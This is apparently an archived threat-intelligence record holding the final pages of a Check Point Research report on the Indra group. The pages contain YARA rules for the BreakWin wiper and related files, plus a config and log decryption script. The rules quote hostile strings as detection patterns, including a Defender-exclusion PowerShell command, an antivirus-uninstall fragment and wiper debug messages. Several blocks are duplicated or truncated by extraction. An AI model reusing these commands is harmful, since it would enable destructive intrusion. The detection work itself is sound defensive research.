$debug_str_meteor_40 = \"Succeeded setting boot policy to ignore all errors.\"\r\nwide $debug_str_meteor_41 = \"Succeeded creating scheduled task for system with name\" wide\r\n$debug_str_meteor_42 = \"Succeeded disabling recovery mode\" wide $debug_str_meteor_43 = \"Failed to log off\r\nall sessions\" wide $debug_str_meteor_44 = \"Failed to delete shadowcopies.\" wide $debug_str_meteor_45 =\r\n\"Failed logging off session: \" wide $debug_str_meteor_46 = \"Failed setting boot policy to ignore all errors.\" wide\r\n$debug_str_meteor_47 = \"Successfully logged off all local sessions, except winlogon.\" wide\r\n$debug_str_meteor_48 = \"Succeeded creating scheduled task with name %s for user %s.\" wide\r\n$debug_str_meteor_49 = \"Killing all winlogon processes\" wide $debug_str_meteor_50 = \"Logging off users in\r\nWindows 7\" wide $debug_str_meteor_51 = \"Failed logging off all local sessions, except winlogon.\" wide\r\n$debug_str_meteor_52 = \"Failed creating scheduled task with name %s for user %s.\" wide $debug_str_meteor_53\r\n= \"Succeeded deleting shadowcopies.\" wide $debug_str_meteor_54 = \"Logging off users in Windows XP\" wide\r\n$debug_str_meteor_55 = \"Failed changing settings for the created new user.\" wide $debug_str_meteor_56 =\r\n\"Could not open file %s. error message: %s\" wide $debug_str_meteor_57 = \"Could not write to file %s. error\r\nmessage: %s\" wide $debug_str_meteor_58 = \"tCould not tell file pointer location on file %s.\" wide\r\n$debug_str_meteor_59 = \"Could not set file pointer location on file %s to offset %s.\" wide $debug_str_meteor_60\r\n= \"Could not read from file %s. error message: %s\" wide $debug_str_meteor_61 = \"Failed to wipe file %s\" wide\r\n$debug_str_meteor_62 = \"attempted to access encrypted file in offset %s, but it only supports offset 0\" wide\r\n$debug_str_meteor_63 = \"Failed to create thread. Error message: %s\" wide $debug_str_meteor_64 = \"Failed to\r\nwipe file %s\" wide $debug_str_meteor_65 = \"failed to get configuration value with key %s\" wide\r\n$debug_str_meteor_66 = \"failed to parse the configuration from file %s\" wide $debug_str_meteor_67 = \"Failed\r\nposting to server, received unknown exception\" wide $debug_str_meteor_68 = \"Failed posting to server, received\r\nstd::exception\" wide $debug_str_meteor_69 = \"Skipping %s logs. Writing log number %s:\" wide\r\n$debug_str_meteor_70 = \"Start interval logger. Writing logs with an interval of %s logs.\" wide\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 28 of 35\n\n$debug_str_meteor_71 = \"failed to write message to log file %s\" wide $debug_str_meteor_72 = \"The log message\r\nis too big: %s/%s characters.\" wide $debug_str_stardust_0 = \"Stardust has started.\" wide $debug_str_stardust_1 =\r\n\"0Vy0qMGO\" ascii wide $debug_str_comet_0 = \"Comet has started.\" wide $debug_str_comet_1 = \"Comet has\r\nfinished.\" wide $str_lock_my_pc = \"Lock My PC 4\" ascii wide $config_entry_0 = \"state_path\" ascii\r\n$config_entry_1 = \"state_encryption_key\" ascii $config_entry_2 = \"log_server_port\" ascii $config_entry_3 =\r\n\"log_file_path\" ascii $config_entry_4 = \"log_encryption_key\" ascii $config_entry_5 = \"log_server_ip\" ascii\r\n$config_entry_6 = \"processes_to_kill\" ascii $config_entry_7 = \"process_termination_timeout\" ascii\r\n$config_entry_8 = \"paths_to_wipe\" ascii $config_entry_9 = \"wiping_stage_logger_interval\" ascii\r\n$config_entry_10 = \"locker_exe_path\" ascii $config_entry_11 = \"locker_background_image_jpg_path\" ascii\r\n$config_entry_12 = \"auto_logon_path\" ascii $config_entry_13 = \"locker_installer_path\" ascii $config_entry_14 =\r\n\"locker_password_hash\" ascii $config_entry_15 = \"users_password\" ascii $config_entry_16 =\r\n\"locker_background_image_bmp_path\" ascii $config_entry_17 = \"locker_registry_settings_files\" ascii\r\n$config_entry_18 = \"cleanup_script_path\" ascii $config_entry_19 = \"is_alive_loop_interval\" ascii\r\n$config_entry_20 = \"cleanup_scheduled_task_name\" ascii $config_entry_21 = \"self_scheduled_task_name\" ascii\r\n$encryption_asm = {33 D2 8B C3 F7 75 E8 8B 41 04 8B 4E 04 8A 04 02 02 C3 32 04 1F 88 45 F3 39 4E 08}\r\n$random_string_generation = {33 D2 59 F7 F1 83 ?? ?? 08 66 0F BE 82 ?? ?? ?? 00 0F B7 C8 8B C7} condition:\r\nuint16(0) == 0x5A4D and ( 6 of them or $encryption_asm or $random_string_generation ) } rule\r\nZZ_breakwin_stardust_vbs { meta: description = \"Detect the VBS files that where found in the attacks on targets\r\nin Syria\" author = \"Check Point Research\" date = \"22-07-2021\" hash =\r\n\"38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\" hash =\r\n\"62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\" hash =\r\n\"4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58\" hash =\r\n\"eb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\" hash =\r\n\"5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\" strings: $url_template =\r\n\"progress.php?hn=\\\" \u0026 CN \u0026 \\\"\u0026dt=\\\" \u0026 DT \u0026 \\\"\u0026st=\" $compression_password_1 =\r\n\"YWhZMFU1VlZGdGNFNWlhMVlVMnhTMWtOVlJVWWNGTk9iVTQxVW10V0ZFeFJUMD0r\"\r\n$compression_password_2 =\r\n\"YWlvcyBqQCNAciNxIGpmc2FkKnIoOUZURjlVSjBSRjJRSlJGODlKSDIzRmloIG8\" $uninstall_kaspersky =\r\n\"Shell.Run \\\"msiexec.exe /x \\\" \u0026 productcode \u0026 \\\" KLLOGIN=\" $is_avp_running = \"isProcessRunning(\\\".\\\",\r\n\\\"avp.exe\\\") Then\" condition: any of them } rule ZZ_breakwin_meteor_batch_files { meta: description = \"Detect\r\nthe batch files used in the attacks\" author = \"Check Point Research\" date = \"22-07-2021\" strings: $filename_0 =\r\n\"mscap.bmp\" $filename_1 = \"mscap.jpg\" $filename_2 = \"msconf.conf\" $filename_3 = \"msmachine.reg\"\r\n$filename_4 = \"mssetup.exe\" $filename_5 = \"msuser.reg\" $filename_6 = \"msapp.exe\" $filename_7 = \"bcd.rar\"\r\n$filename_8 = \"bcd.bat\" $filename_9 = \"msrun.bat\" $command_line_0 = \"powershell -Command\r\n\\\"%exclude_command% '%defender_exclusion_folder%\" $command_line_1 = \"start /b \\\"\\\" update.bat hackemall\"\r\ncondition: 4 of ($filename_*) or any of ($command_line_*) }\r\nrule ZZ_breakwin_config {\r\n meta:\r\n description = \"Detects the header of the encrypted config files, assuming known encryption ke\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n hash = \"948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed\"\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 29 of 35\n\nhash = \"2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\"\r\n hash = \"68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\"\r\n strings:\r\n$conf_header = {1A 69 45 47 5E 46 4A 06 03 E4 34 0B 06 1D ED 2F 02 15 02 E5 57 4D 59\r\ncondition:\r\n$conf_header at 0\r\n}\r\nrule ZZ_breakwin_wiper {\r\n meta:\r\n description = \"Detects the BreakWin wiper that was used in attacks in Syria\"\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n hash = \"2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\"\r\n hash = \"6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\"\r\n hash = \"d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\"\r\n strings:\r\n $debug_str_meteor_1 = \"the program received an invalid number of arguments\" wide\r\n $debug_str_meteor_2 = \"End interval logger. Resuming writing every log\" wide\r\n $debug_str_meteor_0 = \"failed to initialize configuration from file\" wide\r\n $debug_str_meteor_3 = \"Meteor is still alive.\" wide\r\n $debug_str_meteor_4 = \"Exiting main function because of some error\" wide\r\n $debug_str_meteor_5 = \"Meteor has finished. This shouldn't be possible because of the is-aliv\r\n $debug_str_meteor_6 = \"Meteor has started.\" wide\r\n $debug_str_meteor_7 = \"Could not hide current console.\" wide\r\n $debug_str_meteor_8 = \"Could not get the window handle used by the console.\" wide\r\n $debug_str_meteor_9 = \"Failed to find base-64 data size\" wide\r\n $debug_str_meteor_10 = \"Running locker thread\" wide\r\n $debug_str_meteor_11 = \"Failed to encode wide-character string as Base64\" wide\r\n $debug_str_meteor_12 = \"Wiper operation failed.\" wide\r\n $debug_str_meteor_13 = \"Screen saver disable failed.\" wide\r\n $debug_str_meteor_14 = \"Failed to generate password of length %s. Generating a default one.\"\r\n $debug_str_meteor_15 = \"Failed to delete boot configuration\" wide\r\n $debug_str_meteor_16 = \"Could not delete all BCD entries.\" wide\r\n $debug_str_meteor_17 = \"Finished deleting BCD entries.\" wide\r\n $debug_str_meteor_18 = \"Failed to change lock screen\" wide\r\n $debug_str_meteor_19 = \"Boot configuration deleted successfully\" wide\r\n $debug_str_meteor_20 = \"Failed to kill all winlogon processes\" wide\r\n $debug_str_meteor_21 = \"Changing passwords of all users to\" wide\r\n $debug_str_meteor_22 = \"Failed to change the passwords of all users\" wide\r\n $debug_str_meteor_23 = \"Failed to run the locker thread\" wide\r\n $debug_str_meteor_24 = \"Screen saver disabled successfully.\" wide\r\n $debug_str_meteor_25 = \"Generating random password failed\" wide\r\n $debug_str_meteor_26 = \"Locker installation failed\" wide\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 30 of 35\n\n$debug_str_meteor_27 = \"Failed to set auto logon.\" wide\r\n $debug_str_meteor_28 = \"Failed to initialize interval logger. Using a dummy logger instead.\"\r\n $debug_str_meteor_29 = \"Succeeded setting auto logon for\" wide\r\n $debug_str_meteor_30 = \"Failed disabling the first logon privacy settings user approval.\" wid\r\n $debug_str_meteor_31 = \"Failed disabling the first logon animation.\" wide\r\n $debug_str_meteor_32 = \"Waiting for new winlogon process\" wide\r\n $debug_str_meteor_33 = \"Failed to isolate from domain\" wide\r\n $debug_str_meteor_34 = \"Failed creating scheduled task for system with name %s.\" wide\r\n $debug_str_meteor_35 = \"Failed to get the new token of winlogon.\" wide\r\n $debug_str_meteor_36 = \"Failed adding new admin user.\" wide\r\n $debug_str_meteor_37 = \"Failed changing settings for the created new user.\" wide\r\n $debug_str_meteor_38 = \"Failed disabling recovery mode.\" wide\r\n $debug_str_meteor_39 = \"Logging off users on Windows version 8 or above\" wide\r\n $debug_str_meteor_40 = \"Succeeded setting boot policy to ignore all errors.\" wide\r\n $debug_str_meteor_41 = \"Succeeded creating scheduled task for system with name\" wide\r\n $debug_str_meteor_42 = \"Succeeded disabling recovery mode\" wide\r\n $debug_str_meteor_43 = \"Failed to log off all sessions\" wide\r\n $debug_str_meteor_44 = \"Failed to delete shadowcopies.\" wide\r\n $debug_str_meteor_45 = \"Failed logging off session: \" wide\r\n $debug_str_meteor_46 = \"Failed setting boot policy to ignore all errors.\" wide\r\n $debug_str_meteor_47 = \"Successfully logged off all local sessions, except winlogon.\" wide\r\n $debug_str_meteor_48 = \"Succeeded creating scheduled task with name %s for user %s.\" wide\r\n $debug_str_meteor_49 = \"Killing all winlogon processes\" wide\r\n $debug_str_meteor_50 = \"Logging off users in Windows 7\" wide\r\n $debug_str_meteor_51 = \"Failed logging off all local sessions, except winlogon.\" wide\r\n $debug_str_meteor_52 = \"Failed creating scheduled task with name %s for user %s.\" wide\r\n $debug_str_meteor_53 = \"Succeeded deleting shadowcopies.\" wide\r\n $debug_str_meteor_54 = \"Logging off users in Windows XP\" wide\r\n $debug_str_meteor_55 = \"Failed changing settings for the created new user.\" wide\r\n $debug_str_meteor_56 = \"Could not open file %s. error message: %s\" wide\r\n $debug_str_meteor_57 = \"Could not write to file %s. error message: %s\" wide\r\n $debug_str_meteor_58 = \"tCould not tell file pointer location on file %s.\" wide\r\n $debug_str_meteor_59 = \"Could not set file pointer location on file %s to offset %s.\" wide\r\n $debug_str_meteor_60 = \"Could not read from file %s. error message: %s\" wide\r\n $debug_str_meteor_61 = \"Failed to wipe file %s\" wide\r\n $debug_str_meteor_62 = \"attempted to access encrypted file in offset %s, but it only supports\r\n $debug_str_meteor_63 = \"Failed to create thread. Error message: %s\" wide\r\n $debug_str_meteor_64 = \"Failed to wipe file %s\" wide\r\n $debug_str_meteor_65 = \"failed to get configuration value with key %s\" wide\r\n $debug_str_meteor_66 = \"failed to parse the configuration from file %s\" wide\r\n $debug_str_meteor_67 = \"Failed posting to server, received unknown exception\" wide\r\n $debug_str_meteor_68 = \"Failed posting to server, received std::exception\" wide\r\n $debug_str_meteor_69 = \"Skipping %s logs. Writing log number %s:\" wide\r\n $debug_str_meteor_70 = \"Start interval logger. Writing logs with an interval of %s logs.\" wid\r\n $debug_str_meteor_71 = \"failed to write message to log file %s\" wide\r\n $debug_str_meteor_72 = \"The log message is too big: %s/%s characters.\" wide\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 31 of 35\n\n$debug_str_stardust_0 = \"Stardust has started.\" wide\r\n $debug_str_stardust_1 = \"0Vy0qMGO\" ascii wide\r\n $debug_str_comet_0 = \"Comet has started.\" wide\r\n $debug_str_comet_1 = \"Comet has finished.\" wide\r\n $str_lock_my_pc = \"Lock My PC 4\" ascii wide\r\n $config_entry_0 = \"state_path\" ascii\r\n $config_entry_1 = \"state_encryption_key\" ascii\r\n $config_entry_2 = \"log_server_port\" ascii\r\n $config_entry_3 = \"log_file_path\" ascii\r\n $config_entry_4 = \"log_encryption_key\" ascii\r\n $config_entry_5 = \"log_server_ip\" ascii\r\n $config_entry_6 = \"processes_to_kill\" ascii\r\n $config_entry_7 = \"process_termination_timeout\" ascii\r\n $config_entry_8 = \"paths_to_wipe\" ascii\r\n $config_entry_9 = \"wiping_stage_logger_interval\" ascii\r\n $config_entry_10 = \"locker_exe_path\" ascii\r\n $config_entry_11 = \"locker_background_image_jpg_path\" ascii\r\n $config_entry_12 = \"auto_logon_path\" ascii\r\n $config_entry_13 = \"locker_installer_path\" ascii\r\n $config_entry_14 = \"locker_password_hash\" ascii\r\n $config_entry_15 = \"users_password\" ascii\r\n $config_entry_16 = \"locker_background_image_bmp_path\" ascii\r\n $config_entry_17 = \"locker_registry_settings_files\" ascii\r\n $config_entry_18 = \"cleanup_script_path\" ascii\r\n $config_entry_19 = \"is_alive_loop_interval\" ascii\r\n $config_entry_20 = \"cleanup_scheduled_task_name\" ascii\r\n $config_entry_21 = \"self_scheduled_task_name\" ascii\r\n $encryption_asm = {33 D2 8B C3 F7 75 E8 8B 41 04 8B 4E 04 8A 04 02 02 C3 32 04 1F 88 45 F3 39\r\n $random_string_generation = {33 D2 59 F7 F1 83 ?? ?? 08 66 0F BE 82 ?? ?? ?? 00 0F B7 C8 8B C\r\n condition:\r\n uint16(0) == 0x5A4D and\r\n (\r\n 6 of them or\r\n $encryption_asm or\r\n $random_string_generation\r\n )\r\n}\r\nrule ZZ_breakwin_stardust_vbs {\r\n meta:\r\n description = \"Detect the VBS files that where found in the attacks on targets in Syria\"\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 32 of 35\n\nauthor = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n hash = \"38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\"\r\n hash = \"62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\"\r\n hash = \"4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58\"\r\n hash = \"eb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\"\r\n hash = \"5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\"\r\n strings:\r\n $url_template = \"progress.php?hn=\\\" \u0026 CN \u0026 \\\"\u0026dt=\\\" \u0026 DT \u0026 \\\"\u0026st=\"\r\n $compression_password_1 = \"YWhZMFU1VlZGdGNFNWlhMVlVMnhTMWtOVlJVWWNGTk9iVTQxVW10V0ZFeFJUMD0r\"\r\n $compression_password_2 = \"YWlvcyBqQCNAciNxIGpmc2FkKnIoOUZURjlVSjBSRjJRSlJGODlKSDIzRmloIG8\"\r\n $uninstall_kaspersky = \"Shell.Run \\\"msiexec.exe /x \\\" \u0026 productcode \u0026 \\\" KLLOGIN=\"\r\n $is_avp_running = \"isProcessRunning(\\\".\\\", \\\"avp.exe\\\") Then\"\r\n condition:\r\n any of them\r\n}\r\nrule ZZ_breakwin_meteor_batch_files {\r\n meta:\r\n description = \"Detect the batch files used in the attacks\"\r\n author = \"Check Point Research\"\r\n date = \"22-07-2021\"\r\n strings:\r\n $filename_0 = \"mscap.bmp\"\r\n $filename_1 = \"mscap.jpg\"\r\n $filename_2 = \"msconf.conf\"\r\n $filename_3 = \"msmachine.reg\"\r\n $filename_4 = \"mssetup.exe\"\r\n $filename_5 = \"msuser.reg\"\r\n $filename_6 = \"msapp.exe\"\r\n $filename_7 = \"bcd.rar\"\r\n $filename_8 = \"bcd.bat\"\r\n $filename_9 = \"msrun.bat\"\r\n $command_line_0 = \"powershell -Command \\\"%exclude_command% '%defender_exclusion_folder%\"\r\n $command_line_1 = \"start /b \\\"\\\" update.bat hackemall\"\r\n condition:\r\n 4 of ($filename_*) or\r\n any of ($command_line_*)\r\n}\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 33 of 35\n\nAppendix C – Config and Log Decryption Script\r\nfrom malduck import xor, u32\r\ndef decode_buffer(buf, key):\r\nfor k,v in enumerate(buf):\r\n# XOR is rolled by the index of the encrypted character\r\nresults += chr (((k % 256) + key[k % len(key)] ^ v) \u0026 0xff)\r\ndef decode_log_file(filepath):\r\ncontent = open(filepath,'rb').read()\r\nkey = b\"aceg\" # modified 'abcdz' because of shifting indexes\r\nwhile offset \u003c len(content):\r\nsz = u32(xor(key, content[offset:offset+4])) + 4\r\nprint(decode_buffer(content[offset:offset+sz], b\"abcdz\"))\r\ndef decode_config(filepath, key=b\"abcdz\"):\r\ncontent = open(filepath,'rb').read()\r\nreturn decode_buffer(content, key)\r\nfrom malduck import xor, u32 def decode_buffer(buf, key): results = \"\" for k,v in enumerate(buf): # XOR is rolled\r\nby the index of the encrypted character results += chr (((k % 256) + key[k % len(key)] ^ v) \u0026 0xff) return results\r\ndef decode_log_file(filepath): content = open(filepath,'rb').read() key = b\"aceg\" # modified 'abcdz' because of\r\nshifting indexes offset = 0 while offset \u003c len(content): sz = u32(xor(key, content[offset:offset+4])) + 4\r\nprint(decode_buffer(content[offset:offset+sz], b\"abcdz\")) offset += sz def decode_config(filepath, key=b\"abcdz\"):\r\ncontent = open(filepath,'rb').read() return decode_buffer(content, key)\r\nfrom malduck import xor, u32\r\ndef decode_buffer(buf, key):\r\n results = \"\"\r\n for k,v in enumerate(buf):\r\n # XOR is rolled by the index of the encrypted character\r\n results += chr (((k % 256) + key[k % len(key)] ^ v) \u0026 0xff)\r\n return results\r\ndef decode_log_file(filepath):\r\n content = open(filepath,'rb').read()\r\n key = b\"aceg\" # modified 'abcdz' because of shifting indexes\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 34 of 35\n\noffset = 0\r\n while offset \u003c len(content):\r\n sz = u32(xor(key, content[offset:offset+4])) + 4\r\n print(decode_buffer(content[offset:offset+sz], b\"abcdz\"))\r\n offset += sz\r\ndef decode_config(filepath, key=b\"abcdz\"):\r\n content = open(filepath,'rb').read()\r\n return decode_buffer(content, key)\r\nSource: https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 35 of 35",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/"
	],
	"report_names": [
		"indra-hackers-behind-recent-attacks-on-iran"
	],
	"threat_actors": [
		{
			"id": "8309f9cf-9abb-4ce3-aa1e-cda7d7f5c1b3",
			"created_at": "2022-10-25T16:07:23.729215Z",
			"updated_at": "2026-04-10T02:00:04.729076Z",
			"deleted_at": null,
			"main_name": "Indra",
			"aliases": [],
			"source_name": "ETDA:Indra",
			"tools": [
				"Stardust"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8d28f58b-5ea2-4450-a74a-4a1e39caba6e",
			"created_at": "2026-03-16T02:02:50.582318Z",
			"updated_at": "2026-04-10T02:00:03.777263Z",
			"deleted_at": null,
			"main_name": "COASTLIGHT",
			"aliases": [
				"Gonjeshke Darande",
				"Indra",
				"Predatory Sparrow"
			],
			"source_name": "Secureworks:COASTLIGHT",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "219ddb41-2ea8-4121-8b63-8c762f7e15df",
			"created_at": "2023-01-06T13:46:39.384442Z",
			"updated_at": "2026-04-10T02:00:03.309654Z",
			"deleted_at": null,
			"main_name": "Predatory Sparrow",
			"aliases": [
				"Indra",
				"Gonjeshke Darande"
			],
			"source_name": "MISPGALAXY:Predatory Sparrow",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434739,
	"ts_updated_at": 1775792119,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6713bb014aef8caa0bbf5b439368d6bce119664d.pdf",
		"text": "https://archive.orkl.eu/6713bb014aef8caa0bbf5b439368d6bce119664d.txt",
		"img": "https://archive.orkl.eu/6713bb014aef8caa0bbf5b439368d6bce119664d.jpg"
	}
}